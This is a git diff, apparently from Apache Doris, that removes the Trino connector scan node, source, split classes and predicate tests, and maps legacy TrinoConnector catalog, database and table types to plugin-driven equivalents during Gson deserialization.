DynamicFilter.EMPTY; - } - - ConnectorSession connectorSession = session.toConnectorSession(source.getCatalogHandle()); - // Constraint is not used by Hive/BigQuery Connector - ConnectorSplitSource connectorSplitSource = splitManager.getSplits(source.getConnectorTransactionHandle(), - connectorSession, table, dynamicFilter, constraint); - - SplitSource splitSource = new ConnectorAwareSplitSource(source.getCatalogHandle(), connectorSplitSource); - if (this.minScheduleSplitBatchSize > 1) { - ExecutorService executorService = Executors.newCachedThreadPool( - Threads.daemonThreadsNamed(TrinoConnectorScanNode.class.getSimpleName() + "-%s")); - splitSource = new BufferingSplitSource(splitSource, - new BoundedExecutor(executorService, 10), this.minScheduleSplitBatchSize); - } - return splitSource; - } - - private List getNextSplitBatch(SplitSource splitSource) { - return MoreFutures.getFutureValue(splitSource.getNextBatch(1000)).getSplits(); - } - - @Override - protected void setScanParams(TFileRangeDesc rangeDesc, Split split) { - if (split instanceof TrinoConnectorSplit) { - setTrinoConnectorParams(rangeDesc, (TrinoConnectorSplit) split); - } - } - - private void setTrinoConnectorParams(TFileRangeDesc rangeDesc, TrinoConnectorSplit trinoConnectorSplit) { - // mock ObjectMapperProvider - objectMapperProvider = createObjectMapperProvider(); - - // set TTrinoConnectorFileDesc - TTrinoConnectorFileDesc fileDesc = new TTrinoConnectorFileDesc(); - fileDesc.setTrinoConnectorSplit(encodeObjectToString(trinoConnectorSplit.getSplit(), objectMapperProvider)); - fileDesc.setCatalogName(source.getCatalog().getName()); - fileDesc.setDbName(source.getTargetTable().getDbName()); - fileDesc.setTrinoConnectorOptions(source.getCatalog().getTrinoConnectorPropertiesWithCreateTime()); - fileDesc.setTableName(source.getTargetTable().getName()); - fileDesc.setTrinoConnectorTableHandle(encodeObjectToString( - source.getTrinoConnectorTableHandle(), objectMapperProvider)); - - Map columnHandleMap = source.getTargetTable().getColumnHandleMap(); - Map columnMetadataMap = source.getTargetTable().getColumnMetadataMap(); - List columnHandles = new ArrayList<>(); - List columnMetadataList = new ArrayList<>(); - for (SlotDescriptor slotDescriptor : source.getDesc().getSlots()) { - String colName = slotDescriptor.getColumn().getName(); - if (columnMetadataMap.containsKey(colName)) { - columnMetadataList.add(columnMetadataMap.get(colName)); - columnHandles.add(columnHandleMap.get(colName)); - } - } - fileDesc.setTrinoConnectorColumnHandles(encodeObjectToString(columnHandles, objectMapperProvider)); - fileDesc.setTrinoConnectorTrascationHandle( - encodeObjectToString(source.getConnectorTransactionHandle(), objectMapperProvider)); - fileDesc.setTrinoConnectorColumnMetadata(encodeObjectToString(columnMetadataList.stream().map( - filed -> new TrinoColumnMetadata(filed.getName(), filed.getType(), filed.isNullable(), - filed.getComment(), - filed.getExtraInfo(), filed.isHidden(), filed.getProperties())) - .collect(Collectors.toList()), objectMapperProvider)); - - // set TTableFormatFileDesc - TTableFormatFileDesc tableFormatFileDesc = new TTableFormatFileDesc(); - tableFormatFileDesc.setTrinoConnectorParams(fileDesc); - tableFormatFileDesc.setTableFormatType(TableFormatType.TRINO_CONNECTOR.value()); - - // set TFileRangeDesc - rangeDesc.setTableFormatParams(tableFormatFileDesc); - } - - private ObjectMapperProvider createObjectMapperProvider() { - // mock ObjectMapperProvider - ObjectMapperProvider objectMapperProvider = new ObjectMapperProvider(); - Set modules = new HashSet(); - HandleResolver handleResolver = TrinoConnectorPluginLoader.getHandleResolver(); - modules.add(HandleJsonModule.tableHandleModule(handleResolver)); - modules.add(HandleJsonModule.columnHandleModule(handleResolver)); - modules.add(HandleJsonModule.splitModule(handleResolver)); - modules.add(HandleJsonModule.transactionHandleModule(handleResolver)); - // modules.add(HandleJsonModule.outputTableHandleModule(handleResolver)); - // modules.add(HandleJsonModule.insertTableHandleModule(handleResolver)); - // modules.add(HandleJsonModule.tableExecuteHandleModule(handleResolver)); - // modules.add(HandleJsonModule.indexHandleModule(handleResolver)); - // modules.add(HandleJsonModule.partitioningHandleModule(handleResolver)); - // modules.add(HandleJsonModule.tableFunctionHandleModule(handleResolver)); - objectMapperProvider.setModules(modules); - - // set json deserializers - TypeManager typeManager = new InternalTypeManager(TrinoConnectorPluginLoader.getTypeRegistry()); - InternalBlockEncodingSerde blockEncodingSerde = new InternalBlockEncodingSerde(new BlockEncodingManager(), - typeManager); - objectMapperProvider.setJsonSerializers(ImmutableMap.of(Block.class, - new BlockJsonSerde.Serializer(blockEncodingSerde))); - return objectMapperProvider; - } - - private String encodeObjectToString(T t, ObjectMapperProvider objectMapperProvider) { - try { - io.airlift.json.JsonCodec jsonCodec = (io.airlift.json.JsonCodec) new JsonCodecFactory( - objectMapperProvider).jsonCodec(t.getClass()); - return jsonCodec.toJson(t); - } catch (Exception e) { - throw new RuntimeException(e); - } - } - - @Override - public TFileFormatType getFileFormatType() throws DdlException, MetaNotFoundException { - return TFileFormatType.FORMAT_JNI; - } - - @Override - public List getPathPartitionKeys() throws DdlException, MetaNotFoundException { - return new ArrayList<>(); - } - - @Override - public TFileAttributes getFileAttributes() throws UserException { - return source.getFileAttributes(); - } - - @Override - public TableIf getTargetTable() { - // can not use `source.getTargetTable()` - // because source is null when called getTargetTable - return desc.getTable(); - } - - @Override - public Map getLocationProperties() throws MetaNotFoundException, DdlException { - return source.getCatalog().getCatalogProperty().getHadoopProperties(); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSource.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSource.java deleted file mode 100644 index 20dcf996595a48..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSource.java +++ /dev/null @@ -1,106 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector.source; - -import org.apache.doris.analysis.TupleDescriptor; -import org.apache.doris.common.UserException; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalCatalog; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalTable; -import org.apache.doris.thrift.TFileAttributes; - -import io.trino.Session; -import io.trino.connector.ConnectorName; -import io.trino.spi.connector.CatalogHandle; -import io.trino.spi.connector.Connector; -import io.trino.spi.connector.ConnectorMetadata; -import io.trino.spi.connector.ConnectorTableHandle; -import io.trino.spi.connector.ConnectorTransactionHandle; - -public class TrinoConnectorSource { - private final TupleDescriptor desc; - private final TrinoConnectorExternalCatalog trinoConnectorExternalCatalog; - private final TrinoConnectorExternalTable trinoConnectorExtTable; - private final CatalogHandle catalogHandle; - private final Session trinoSession; - private final Connector connector; - private final ConnectorName connectorName; - private ConnectorTransactionHandle connectorTransactionHandle; - private ConnectorTableHandle trinoConnectorTableHandle; - private ConnectorMetadata connectorMetadata; - - public TrinoConnectorSource(TupleDescriptor desc) { - this.desc = desc; - this.trinoConnectorExtTable = (TrinoConnectorExternalTable) desc.getTable(); - this.trinoConnectorExternalCatalog = (TrinoConnectorExternalCatalog) trinoConnectorExtTable.getCatalog(); - this.catalogHandle = trinoConnectorExternalCatalog.getTrinoCatalogHandle(); - this.trinoConnectorTableHandle = trinoConnectorExtTable.getConnectorTableHandle(); - this.connectorMetadata = trinoConnectorExtTable.getConnectorMetadata(); - this.connectorTransactionHandle = trinoConnectorExtTable.getConnectorTransactionHandle(); - this.trinoSession = trinoConnectorExternalCatalog.getTrinoSession(); - this.connector = trinoConnectorExternalCatalog.getConnector(); - this.connectorName = trinoConnectorExternalCatalog.getConnectorName(); - } - - public TupleDescriptor getDesc() { - return desc; - } - - public ConnectorTableHandle getTrinoConnectorTableHandle() { - return trinoConnectorTableHandle; - } - - public TrinoConnectorExternalTable getTargetTable() { - return trinoConnectorExtTable; - } - - public TFileAttributes getFileAttributes() throws UserException { - return new TFileAttributes(); - } - - public TrinoConnectorExternalCatalog getCatalog() { - return trinoConnectorExternalCatalog; - } - - public CatalogHandle getCatalogHandle() { - return catalogHandle; - } - - public Session getTrinoSession() { - return trinoSession; - } - - public Connector getConnector() { - return connector; - } - - public ConnectorName getConnectorName() { - return connectorName; - } - - public ConnectorMetadata getConnectorMetadata() { - return connectorMetadata; - } - - public void setTrinoConnectorTableHandle(ConnectorTableHandle trinoConnectorExtTableHandle) { - this.trinoConnectorTableHandle = trinoConnectorExtTableHandle; - } - - public ConnectorTransactionHandle getConnectorTransactionHandle() { - return connectorTransactionHandle; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSplit.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSplit.java deleted file mode 100644 index 3aca8ba96d14a8..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSplit.java +++ /dev/null @@ -1,95 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector.source; - -import org.apache.doris.common.util.LocationPath; -import org.apache.doris.datasource.FileSplit; -import org.apache.doris.datasource.TableFormatType; - -import io.trino.connector.ConnectorName; -import io.trino.spi.HostAddress; -import io.trino.spi.connector.ConnectorSplit; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.util.ArrayList; -import java.util.List; -import java.util.Map; - -public class TrinoConnectorSplit extends FileSplit { - private static final Logger LOG = LogManager.getLogger(TrinoConnectorSplit.class); - private static final LocationPath DUMMY_PATH = LocationPath.of("/dummyPath"); - private ConnectorSplit connectorSplit; - private TableFormatType tableFormatType; - private final ConnectorName connectorName; - - public TrinoConnectorSplit(ConnectorSplit connectorSplit, ConnectorName connectorName) { - super(DUMMY_PATH, 0, 0, 0, 0, null, null); - this.connectorSplit = connectorSplit; - this.tableFormatType = TableFormatType.TRINO_CONNECTOR; - this.connectorName = connectorName; - initSplitInfo(); - } - - public ConnectorSplit getSplit() { - return connectorSplit; - } - - public void setSplit(ConnectorSplit connectorSplit) { - this.connectorSplit = connectorSplit; - } - - public TableFormatType getTableFormatType() { - return tableFormatType; - } - - public void setTableFormatType(TableFormatType tableFormatType) { - this.tableFormatType = tableFormatType; - } - - private void initSplitInfo() { - // set hosts - List addresses = connectorSplit.getAddresses(); - this.hosts = new String[addresses.size()]; - for (int i = 0; i < addresses.size(); i++) { - hosts[i] = addresses.get(0).getHostText(); - } - - switch (connectorName.toString()) { - case "hive": - initHiveSplitInfo(); - break; - default: - LOG.debug("Unknow connector name: " + connectorName); - return; - } - } - - private void initHiveSplitInfo() { - Object info = connectorSplit.getInfo(); - if (info instanceof Map) { - Map splitInfo = (Map) info; - path = LocationPath.of((String) splitInfo.getOrDefault("path", "dummyPath")); - start = (long) splitInfo.getOrDefault("start", 0); - length = (long) splitInfo.getOrDefault("length", 0); - fileLength = (long) splitInfo.getOrDefault("estimatedFileSize", 0); - partitionValues = new ArrayList<>(); - partitionValues.add((String) splitInfo.getOrDefault("partitionName", "")); - } - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java index 9000e3b48a82a5..b90e759d81d6ad 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java @@ -71,8 +71,6 @@ import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; import org.apache.doris.datasource.maxcompute.source.MaxComputeScanNode; import org.apache.doris.datasource.paimon.source.PaimonScanNode; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalTable; -import org.apache.doris.datasource.trinoconnector.source.TrinoConnectorScanNode; import org.apache.doris.fs.DirectoryLister; import org.apache.doris.fs.FileSystemDirectoryLister; import org.apache.doris.fs.TransactionScopeCachingDirectoryListerFactory; @@ -776,9 +774,6 @@ public PlanFragment visitPhysicalFileScan(PhysicalFileScan fileScan, PlanTransla } else if (table.getType() == TableIf.TableType.PAIMON_EXTERNAL_TABLE) { scanNode = new PaimonScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext()); - } else if (table instanceof TrinoConnectorExternalTable) { - scanNode = new TrinoConnectorScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, - context.getScanContext()); } else if (table instanceof MaxComputeExternalTable) { scanNode = new MaxComputeScanNode(context.nextPlanNodeId(), tupleDescriptor, fileScan.getSelectedPartitions(), false, sv, context.getScanContext()); diff --git a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java index ad543a2d0be302..51a933e3cd8c63 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java +++ b/fe/fe-core/src/main/java/org/apache/doris/persist/gson/GsonUtils.java @@ -178,9 +178,6 @@ import org.apache.doris.datasource.test.TestExternalCatalog; import org.apache.doris.datasource.test.TestExternalDatabase; import org.apache.doris.datasource.test.TestExternalTable; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalCatalog; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalDatabase; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorExternalTable; import org.apache.doris.dictionary.Dictionary; import org.apache.doris.job.extensions.insert.InsertJob; import org.apache.doris.job.extensions.insert.streaming.StreamingInsertJob; @@ -398,8 +395,6 @@ public class GsonUtils { .registerSubtype(PaimonFileExternalCatalog.class, PaimonFileExternalCatalog.class.getSimpleName()) .registerSubtype(PaimonRestExternalCatalog.class, PaimonRestExternalCatalog.class.getSimpleName()) .registerSubtype(MaxComputeExternalCatalog.class, MaxComputeExternalCatalog.class.getSimpleName()) - .registerSubtype( - TrinoConnectorExternalCatalog.class, TrinoConnectorExternalCatalog.class.getSimpleName()) .registerSubtype(LakeSoulExternalCatalog.class, LakeSoulExternalCatalog.class.getSimpleName()) .registerSubtype(TestExternalCatalog.class, TestExternalCatalog.class.getSimpleName()) .registerSubtype(PaimonDLFExternalCatalog.class, PaimonDLFExternalCatalog.class.getSimpleName()) @@ -411,7 +406,10 @@ public class GsonUtils { PluginDrivenExternalCatalog.class, "EsExternalCatalog") // Migrate old JDBC catalogs to PluginDriven on deserialization .registerCompatibleSubtype( - PluginDrivenExternalCatalog.class, "JdbcExternalCatalog"); + PluginDrivenExternalCatalog.class, "JdbcExternalCatalog") + // Migrate old Trino-connector catalogs to PluginDriven on deserialization + .registerCompatibleSubtype( + PluginDrivenExternalCatalog.class, "TrinoConnectorExternalCatalog"); if (Config.isNotCloudMode()) { dsTypeAdapterFactory .registerSubtype(InternalCatalog.class, InternalCatalog.class.getSimpleName()); @@ -454,14 +452,15 @@ public class GsonUtils { .registerSubtype(MaxComputeExternalDatabase.class, MaxComputeExternalDatabase.class.getSimpleName()) .registerSubtype(ExternalInfoSchemaDatabase.class, ExternalInfoSchemaDatabase.class.getSimpleName()) .registerSubtype(ExternalMysqlDatabase.class, ExternalMysqlDatabase.class.getSimpleName()) - .registerSubtype(TrinoConnectorExternalDatabase.class, TrinoConnectorExternalDatabase.class.getSimpleName()) .registerSubtype(TestExternalDatabase.class, TestExternalDatabase.class.getSimpleName()) .registerSubtype(PluginDrivenExternalDatabase.class, PluginDrivenExternalDatabase.class.getSimpleName()) .registerCompatibleSubtype( PluginDrivenExternalDatabase.class, "EsExternalDatabase") .registerCompatibleSubtype( - PluginDrivenExternalDatabase.class, "JdbcExternalDatabase"); + PluginDrivenExternalDatabase.class, "JdbcExternalDatabase") + .registerCompatibleSubtype( + PluginDrivenExternalDatabase.class, "TrinoConnectorExternalDatabase"); private static RuntimeTypeAdapterFactory tblTypeAdapterFactory = RuntimeTypeAdapterFactory.of( TableIf.class, "clazz").registerSubtype(ExternalTable.class, ExternalTable.class.getSimpleName()) @@ -473,7 +472,6 @@ public class GsonUtils { .registerSubtype(MaxComputeExternalTable.class, MaxComputeExternalTable.class.getSimpleName()) .registerSubtype(ExternalInfoSchemaTable.class, ExternalInfoSchemaTable.class.getSimpleName()) .registerSubtype(ExternalMysqlTable.class, ExternalMysqlTable.class.getSimpleName()) - .registerSubtype(TrinoConnectorExternalTable.class, TrinoConnectorExternalTable.class.getSimpleName()) .registerSubtype(TestExternalTable.class, TestExternalTable.class.getSimpleName()) .registerSubtype(PluginDrivenExternalTable.class, PluginDrivenExternalTable.class.getSimpleName()) @@ -481,6 +479,8 @@ public class GsonUtils { PluginDrivenExternalTable.class, "EsExternalTable") .registerCompatibleSubtype( PluginDrivenExternalTable.class, "JdbcExternalTable") + .registerCompatibleSubtype( + PluginDrivenExternalTable.class, "TrinoConnectorExternalTable") .registerSubtype(BrokerTable.class, BrokerTable.class.getSimpleName()) .registerSubtype(EsTable.class, EsTable.class.getSimpleName()) .registerSubtype(FunctionGenTable.class, FunctionGenTable.class.getSimpleName()) diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPredicateTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPredicateTest.java deleted file mode 100644 index d01b1ae485b1db..00000000000000 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPredicateTest.java +++ /dev/null @@ -1,736 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.analysis.BinaryPredicate; -import org.apache.doris.analysis.BinaryPredicate.Operator; -import org.apache.doris.analysis.BoolLiteral; -import org.apache.doris.analysis.CompoundPredicate; -import org.apache.doris.analysis.DateLiteral; -import org.apache.doris.analysis.DecimalLiteral; -import org.apache.doris.analysis.Expr; -import org.apache.doris.analysis.FloatLiteral; -import org.apache.doris.analysis.InPredicate; -import org.apache.doris.analysis.IntLiteral; -import org.apache.doris.analysis.LiteralExpr; -import org.apache.doris.analysis.NullLiteral; -import org.apache.doris.analysis.SlotRef; -import org.apache.doris.analysis.StringLiteral; -import org.apache.doris.catalog.ScalarType; -import org.apache.doris.catalog.Type; -import org.apache.doris.catalog.info.TableNameInfo; -import org.apache.doris.common.AnalysisException; -import org.apache.doris.datasource.trinoconnector.source.TrinoConnectorPredicateConverter; - -import com.google.common.collect.ImmutableList; -import com.google.common.collect.ImmutableMap; -import com.google.common.collect.Lists; -import io.airlift.slice.Slices; -import io.trino.spi.connector.ColumnHandle; -import io.trino.spi.connector.ColumnMetadata; -import io.trino.spi.predicate.Domain; -import io.trino.spi.predicate.Range; -import io.trino.spi.predicate.TupleDomain; -import io.trino.spi.predicate.ValueSet; -import io.trino.spi.type.BigintType; -import io.trino.spi.type.BooleanType; -import io.trino.spi.type.CharType; -import io.trino.spi.type.DateType; -import io.trino.spi.type.DecimalType; -import io.trino.spi.type.DoubleType; -import io.trino.spi.type.Int128; -import io.trino.spi.type.IntegerType; -import io.trino.spi.type.LongTimestamp; -import io.trino.spi.type.LongTimestampWithTimeZone; -import io.trino.spi.type.RealType; -import io.trino.spi.type.SmallintType; -import io.trino.spi.type.TimeZoneKey; -import io.trino.spi.type.TimestampType; -import io.trino.spi.type.TimestampWithTimeZoneType; -import io.trino.spi.type.TinyintType; -import io.trino.spi.type.VarbinaryType; -import io.trino.spi.type.VarcharType; -import org.junit.Assert; -import org.junit.BeforeClass; -import org.junit.Test; - -import java.math.BigDecimal; -import java.math.BigInteger; -import java.util.List; -import java.util.Objects; - -public class TrinoConnectorPredicateTest { - - private static final ImmutableMap trinoConnectorColumnHandleMap = - new ImmutableMap.Builder() - .put("c_bool", new MockColumnHandle("c_bool")) - .put("c_tinyint", new MockColumnHandle("c_tinyint")) - .put("c_smallint", new MockColumnHandle("c_smallint")) - .put("c_int", new MockColumnHandle("c_int")) - .put("c_bigint", new MockColumnHandle("c_bigint")) - .put("c_real", new MockColumnHandle("c_real")) - .put("c_short_decimal", new MockColumnHandle("c_short_decimal")) - .put("c_long_decimal", new MockColumnHandle("c_long_decimal")) - .put("c_char", new MockColumnHandle("c_char")) - .put("c_varchar", new MockColumnHandle("c_varchar")) - .put("c_varbinary", new MockColumnHandle("c_varbinary")) - .put("c_date", new MockColumnHandle("c_date")) - .put("c_double", new MockColumnHandle("c_double")) - .put("c_short_timestamp", new MockColumnHandle("c_short_timestamp")) - // .put("c_short_timestamp_timezone", new MockColumnHandle("c_short_timestamp_timezone")) - .put("c_long_timestamp", new MockColumnHandle("c_long_timestamp")) - .put("c_long_timestamp_timezone", new MockColumnHandle("c_long_timestamp_timezone")) - .build(); - - private static final ImmutableMap trinoConnectorColumnMetadataMap = - new ImmutableMap.Builder() - .put("c_bool", new ColumnMetadata("c_bool", BooleanType.BOOLEAN)) - .put("c_tinyint", new ColumnMetadata("c_tinyint", TinyintType.TINYINT)) - .put("c_smallint", new ColumnMetadata("c_smallint", SmallintType.SMALLINT)) - .put("c_int", new ColumnMetadata("c_int", IntegerType.INTEGER)) - .put("c_bigint", new ColumnMetadata("c_bigint", BigintType.BIGINT)) - .put("c_real", new ColumnMetadata("c_real", RealType.REAL)) - .put("c_short_decimal", new ColumnMetadata("c_short_decimal", - DecimalType.createDecimalType(9, 2))) - .put("c_long_decimal", new ColumnMetadata("c_long_decimal", - DecimalType.createDecimalType(38, 15))) - .put("c_char", new ColumnMetadata("c_char", CharType.createCharType(128))) - .put("c_varchar", new ColumnMetadata("c_varchar", - VarcharType.createVarcharType(128))) - .put("c_varbinary", new ColumnMetadata("c_varbinary", VarbinaryType.VARBINARY)) - .put("c_date", new ColumnMetadata("c_date", DateType.DATE)) - .put("c_double", new ColumnMetadata("c_double", DoubleType.DOUBLE)) - .put("c_short_timestamp", new ColumnMetadata("c_short_timestamp", - TimestampType.TIMESTAMP_MICROS)) - // .put("c_short_timestamp_timezone", new ColumnMetadata("c_short_timestamp_timezone", - // TimestampWithTimeZoneType.TIMESTAMP_TZ_MILLIS)) - .put("c_long_timestamp", new ColumnMetadata("c_long_timestamp", - TimestampType.TIMESTAMP_PICOS)) - .put("c_long_timestamp_timezone", new ColumnMetadata("c_long_timestamp_timezone", - TimestampWithTimeZoneType.TIMESTAMP_TZ_PICOS)) - .build(); - - private static TrinoConnectorPredicateConverter trinoConnectorPredicateConverter; - - @BeforeClass - public static void before() throws AnalysisException { - trinoConnectorPredicateConverter = new TrinoConnectorPredicateConverter( - trinoConnectorColumnHandleMap, - trinoConnectorColumnMetadataMap); - } - - @Test - public void testBinaryEqPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain domain = Domain.create(ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - expectTupleDomain.add(tupleDomain); - } - - // test results, construct equal binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(BinaryPredicate.Operator.EQ, slotRefs.get(i), - literalList.get(i)); - TupleDomain tupleDomain = trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain( - expr); - testTupleDomain.add(tupleDomain); - } - - // verify if `testTupleDomain` is equal to `expectTupleDomain`. - for (int i = 0; i < expectTupleDomain.size(); i++) { - Assert.assertTrue(expectTupleDomain.get(i).contains(testTupleDomain.get(i))); - } - } - - @Test - public void testBinaryEqualForNullPredicate() throws AnalysisException { - // construct slotRefs and literalLists - List slotRefs = mockSlotRefs(); - List literalList = mockLiteralExpr(); - - // expect results - List> expectTupleDomain = Lists.newArrayList(); - ImmutableList expectRanges = new ImmutableList.Builder() - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_bool").getType(), true)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_tinyint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_smallint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_int").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_bigint").getType(), 1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_real").getType(), - Long.valueOf(Float.floatToIntBits(1.23f)))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_double").getType(), 3.1415926456)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_decimal").getType(), 12345623L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_decimal").getType(), - Int128.valueOf(new BigInteger("12345678901234567890123123")))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_char").getType(), - Slices.utf8Slice("trino connector char test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_varchar").getType(), - Slices.utf8Slice("trino connector varchar test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_varbinary").getType(), - Slices.utf8Slice("trino connector varbinary test"))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_date").getType(), -1L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_timestamp").getType(), - 1000001L)) - // .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_short_timestamp_timezone").getType(), - // 0L)) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_timestamp").getType(), - new LongTimestamp(1000001L, 0))) - .add(Range.equal(trinoConnectorColumnMetadataMap.get("c_long_timestamp_timezone").getType(), - LongTimestampWithTimeZone.fromEpochMillisAndFraction(1000L, 1000000, - TimeZoneKey.getTimeZoneKey("Asia/Shanghai")))) - .build(); - for (int i = 0; i < slotRefs.size(); i++) { - final String colName = slotRefs.get(i).getColumnName(); - Domain domain = Domain.create(ValueSet.ofRanges(Lists.newArrayList(expectRanges.get(i))), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - expectTupleDomain.add(tupleDomain); - } - - // test results, construct equal binary predicate - List> testTupleDomain = Lists.newArrayList(); - for (int i = 0; i < slotRefs.size(); i++) { - BinaryPredicate expr = new BinaryPredicate(Operator.EQ_FOR_NULL, slotRefs.get(i), - literalList.get(i)); - TupleDomain 